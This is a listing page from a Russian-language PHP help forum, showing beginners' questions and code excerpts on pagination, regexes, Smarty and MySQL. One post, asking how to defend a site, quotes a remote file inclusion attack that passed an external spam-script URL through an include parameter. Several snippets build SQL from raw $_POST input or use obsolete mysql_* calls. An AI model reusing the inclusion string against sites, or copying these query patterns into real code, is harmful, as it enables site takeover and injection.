PHP
A general-purpose scripting language especially suited to web development
Explore Questions
There are no popular questions to show right now
-
0 votes2 answers
-
0 votes1 answer
-
0 votes1 answer
-
0 votes2 answers
-
0 votes0 answers
2,481 questions in this forum
-
0 votes14 answers
-
Помощь авто снятие дней
Здравствуйте форумчане, я недавно познакомился с mysql и хотел бы попросить у вас помощи, вот недавно куил сайт там привязка к mysql тоесть если я на сайте задаю логин и клиенту и кол-во дней, то почему-то потом дни не уменьшаются, мне нуэна помощь от знающих тоесть чтобы дни снимались и по истечении дней клиент отключался, если не сложно скажите куда это вписывать =)
0 votes4 answers -
Помощь в понимании работы кода
Доброго времени суток. Ковыряю сейчас скрипт магазина... Не могу понять предназначение некоторого кода, а именно $osTemplate->assign('language', $_SESSION['language']); // передается язык в шаблон $osTemplate->caching = 0; // не кэшировать? $osTemplate->assign('module_content',$module_content); // передается в шаблон массив с данными $main_content=$osTemplate->fetch(CURRENT_TEMPLATE . '/module/latest_news.html'); // файлик который выводит шаблон новостей $osTemplate->assign('main_content',$main_content); // для вывода в шаблоне главной странице в переменной {$main_content} $osTemplate->assign('language', $_SESSION['language']); // передается язык в шаб…
0 votes2 answers -
Помощь в регулярных выражениях
Помогите с регуляркой, вот моя: if (!preg_match("/^[A-Za-z0-9_-]{3,15}$/i",$login)) { $login_pattern_error = "<span class=\"err\">Выберите другой логин</span>\n\r"; $success = false; } В ней допускается использование a-z, A-Z, цифр от 0 до 9, тире, подческивание и длинной от 3 до 15 символов независимо от регистра. Как дописать чтобы нельзя было использовать в логине - и _ в начале и конце?
0 votes6 answers -
Помощь нубу
подскажите почему нету реакции на CSS стили <?php $db = mysql_connect ("mysql-23.ukraine.com.ua","","")OR DIE("Не можу підключитися.. ");; mysql_set_charset ('utf8',$db); mysql_select_db("",$db)or die(mysql_error()); $result = mysql_query ("SELECT id,title, meta_d, meta_k, description, text,date FROM clothes"); $row = mysql_fetch_array ($result); do { printf ("<table class='clothes'> <tr> <td class='clothes_title'><br><p><h1><a href='view_clothes.php?id=%s'>%s</a></h1></p> <br><p class='clothes_adds'><h5>Дата добавления: %s</h5></p></td> </tr> <tr&g…
0 votes7 answers -
Помощь с выводом данных "file_get_contents"
Хочу вывести информацию себе на сайт, с другого сайт не могу поймать отдельные моменты такие как "money", "exp". Нужно получить их значение, на скрине видны они.
0 votes0 answers -
понижение приоритета mysql при бэкапе
Вопрос есть на засыпку)) столкнулся с проблемой, что при бэкапе больших аккаунтов происходит очень большой расход ресурсов. вплоть до зависания всего сервера.... в основном это связано при бэкапе бд.... с последующим архивированием в .tar.gz есть вариант - как понизить приоритет и сократить количество используемых ресурсов? поделитесь, плиз, как решают такую проблему компании, у которых большие бд... а то ночью происходит стопор... от 30 минут до часу и интересен факт, что загруженность скачет. то больше сотни, то по минимуму.... но сайты и админ панель висит((( может это зомби? upd: рестартанул апач, блокировка на других сайтах снялась. а этот акк висит... бэкап…
0 votes0 answers -
Понятие модуль и библиотека в PHP
Объясните, что такое модуль и что такое библиотека в PHP и в чем отличие, в двух словах. Спасибо
0 votes1 answer -
Поочерёдная смена бэкграунда
Сабж. Как организовать поочерёдную смену бэкграунда обычного блока div? Идеальный вариант на css и html, но если никак, может есть приём на php?
0 votes20 answers -
Порблема с защитой, попытка отправки спама с моего email
Добрый день! Возникла проблема. Страницы на сайте генерируются с помощью функции include(), адрес файла передается в ссылке пример index.php?cont=vasya.html. нехороший человек сделал следующее index.php?cont=http://www.freewebtown.com/xslayter1533/frangoSlayter.txt? там форма для рассылки спама... Спам до адресатов не дошел, но ситуация очень неприятная... Каким образом можно защитить сайт от подобных попыток? Слышал что можно кодировать данные в md5, но как именно не понял. Или есть более простая (надежная альтернатива)? Я понимаю, что ошибка глупейшая но очень надеюсь на Вашу помощь!
0 votes6 answers -
Порядковая нумерация материалов в категориях joomla.
Делается интернет-магазин на joomla + virtuemart. Требуется, чтобы товары на странице нумеровались в соответствие с их порядковым номером, и выводились так. Сейчас сделано, что товары нумеруются, и выводятся так, как нужно, но только на 1-ой странице, далее, при переходе на другую страницу, 2 например, нумерация сбрасывается, а нужно чтобы продолжалась. Как можно реализовать это? Сейчас сделал так <div id="catalogitemnum"><?php echo $materialcounter;$materialcounter = $materialcounter + 1;if (($materialcounter == 15) && ($materialcounter == 30)&& ($materialcounter == 45)) {$materialcounterMem = $materialcounter;}?> </div>materialc…
0 votes2 answers -
посик тэгов по базе
<? $all = array(); for ($i=1,$i < 9, $i++) // прогоняем все таблицы { $query="select question from ".$this->tables[$i]." where "; foreach($this->words as $word) { $query = str_replace('#OR#','OR',$query) $query.=" question like '%".addslashes($word)."%' #OR#"; } $query = str_replace('#OR#','',$query); // мутим запрос $query = $this -> sql -> query ($query); //имеем массив или фолс if ($query != false) foreach($query[0] as $result) { $all[] = $result; //добавляем совпадения по эгам в общий массив и идем к нэкст таблице } } в конце получаем массив вопросов $all , в которых есть тэги. Нужно найти наиболее вероятный вопрос …
0 votes5 answers -
После каждого второго
Дело в том, что у меня на страницу выводиться по 5 материалов. Я хочу сделать, чтобы на каждой странице после второго материала был текст. Как это можно сделать?
0 votes2 answers -
После отправки формы открывалась другая страница. Как?
Помогите пожалуйста, просто создаю свой первый сайт и еще многого не знаю. Как сделать чтобы после отправки формы открывалась другая страница?
0 votes9 answers -
Последние сообщения с Twitter
Не подскажите каким способом лучше поместить статус твитера ? Нашёл вот такое решение - http://abeautifulsite.net/notebook/75 , хочу попробывать, но не совсем ясно куда добавлять код, с пхп не знаком вообще...
0 votes10 answers -
Последняя папка в пути
Здравствуйте товарищи программисты.Есть простая задачка: допустим у меня путь к выбранной папке /папка3/папка2/папка1 и вс? это дело содержится в переменной,а мне надо чтобы в переменной было только папка1.Наверное надо использовать какую то функцию и регулярные выражения.Если кто то с подобной задачей сталкивался,подскажите,буду благодарен
0 votes1 answer -
Последовательность разработки проекта
Всем доброе время суток, прошу у знающих совета по реализации за планируемого проекта: Реализация планируется в несколько этапов: Сбор пользователей и коммуникации с ними(задача: максимальные привлекательность и удобство для пользователей исключив риски от больших нагрузок и безапастность ) Монетизация собранной аудитории(задача: максимальные удобство для пользователей и автоматизация работы и контроля сотрудников, исключив риски от больших нагрузок и безапастность) Общая задача: При развитии проекта дополнять уже имеющееся разработки и инструментарии с наименьшими допиливаниями или полной заменой ранних разработок и инструментариев. Попытаюсь пояснить…
0 votes0 answers -
Посоветуйте с книгой
Подскажите пожалуйста, решил купить книгу по PHP, Котерова и Костарева, PHP 5 в подлиннике, 2-е издание, 2008 год. Подскажите как она? Не старовата, и актуальна ли сейчас. Я можно сказать ничего не знаю в PHP, только некоторые команды, когда баловался со всяким на сайте. http://oz.by/books/more1013570.html?refsource=google_goodsbooks&gclid=CjwKEAjwi6OeBRCCrZqp-qaQhhISJACrfbtAkXdmzADET0lnu4kapicwZtXjSK7SCgP2ZXNmPkrfKBoCxYPw_wcB
0 votes1 answer -
Поставить плюшку при уходе со страницы.
Необходимо поставить плюшку с текущим mktime(), в том случае, если юзер ушел с определенной страницы по ссылке или жамкнул крестик в браузере(закрыл вкладку...), Пробовал onunload, но он и на F5 срабатывает ... да и при закрытии страницы крестиком, врядли js поможет . Слышал что это можно реализовать с помощью php-сессий, т.е. ставить сессию когда юзер на странице и убивать при его уходе, потом проверять, если сессии нет то...%) что же тогда делать.. как быть .. придется записывать время не в плюшку а в файл(база не используется)... если кто-то с подобным сталкивался, поделитесь опытом.
0 votes7 answers -
Постраничная навигация
Подскажите как вывести 10 записей из бд, потом нажимаешь на страницу [2] и тд, выводятся 10 записей перед этими. Выводил так, но без навигации, просто все записи но одной странице <?php // Константы для подключения к СУБД //Хост подключения к БД define('PHP_HOST2', 'localhost'); //Пользователь define('PHP_USER2', 'root'); //Пароль define('PHP_PASS2','741258'); //Базаданных define('PHP_DB2', 'dsp_base'); //Префикс таблиц БД define('PHP_DBPREFIX2', ''); // Подключение к СУБД $link = mysql_connect(PHP_HOST2, PHP_USER2, PHP_PASS2) or die (mysql_error()); // Выбираем базу данных mysql_select_db(PHP_DB2, $link); //Устанавливаем кодировку UTF8 mysql_query ("SET NAMES…
0 votes2 answers -
Постраничная навигация на PHP
Сразу скажу, да, я знаю что в инете полно статей по этой теме, но мне остаются неясными некоторые моменты! Задача: Мне нужно создать php-скрипт, который выводил бы при нажатии на ссылку определенную страницу сайта. Сейчас попробую подробнее объяснить. Структура сайта такова: index.php config.php # Инклюдится к index.php header.php # Инклюдится к index.php menu.php # Инклюдится к header.php content.php # Инклюдится к index.php left_block.php # Инклюдится к content.php center_block.php # Инклюдится к content.php right_block.php # Инклюдится к content.php footer.php # Инклюдится к index.php В меню должна быть ссылка на раздел "Страни…
0 votes2 answers -
постраничная разбивка с использованием smarty
Есть задание реализовать постраничную разбивку с использованием smarty. Подскажите сама разбивка на странице должна происходить в шаблоне или этим должен заниматься PHP? если в шаблоне,то подскажите в какую сторону думать,потому что со smarty работаю в первый раз.
0 votes1 answer -
Постраничный вывод
Всем привет! Возникла проблема. Суть заключается в том, что я организую постраничный вывод данных, по 50 предложений. Все бы ничего, но на этой же странице есть форма позволяющая выбрать только то что нужно, по метро, по цене и т.п. Состоит из 2 выпадающих списков и 8 полей input type=text. Форма методам POST, после нажатия на кнопку, на эту же страницу передает условия для выборки из БД. Например условие выборки из списка станций метро - $tmp1 = " and metro='".$_POST['metro']."'"; Выборка прекрасно работает, но при постраничном выводе, при переходе на любую другую страницу strnitsa.php?page=2 вся выборка сбрасывается, в итоге страница пустая. Какие есть варианты решен…
0 votes24 answers -
Постраничный вывод
Добрый день, уважаемые знатоки. Есть код функции вывода новостей, необходимо этот вывод сделать постранично. // выведем новости//$typ=0 кратко 1- полноfunction GetNews($typ=0){global $mysql;$tmpcont='';//////////////////////////////////////$coltov=15; //количество выводимых новостей на страницеecho ('coltov='.$coltov);if(isset($_GET['p'])){ $p=$_GET['p']; echo ('<br>'."isset: ".$p.'<br>');}else { $p=1; echo ('<br>'."nope: ".$p.'<br>');}$limitstart=($p-1)*$coltov;$query='select count(nw.nomer) as cn from neonnews as nw order by datas' ;$res = $mysql->sql_query($query) ;$list = $mysql->sql_fetchrow($res) ;$colvsego=$list['cn'];echo $colvsego;$…
0 votes5 answers -
Постраничный вывод из bd
Добрый день! При изучении php и попутном создании сайта на php столкнулся с такой проблемой: Нужно выбрать из базы данных всю инфу, но при этом выводить ее постранично, т.к. инфы предпологается много и не хочется загружать одну страницу ею. Собственно сам код: <?php $result = mysql_query("SELECT id,title,date,text FROM lessons ORDER BY id LIMIT 3",$db); $myrow = mysql_fetch_array($result); do { printf ("<table class='tableborder'> <tr> <td><p>%s</p></td> </tr> <tr> <td><p>Дата занесения: %s</p> </td> </tr> <tr> <td><p>%s</p></td> &l…
0 votes11 answers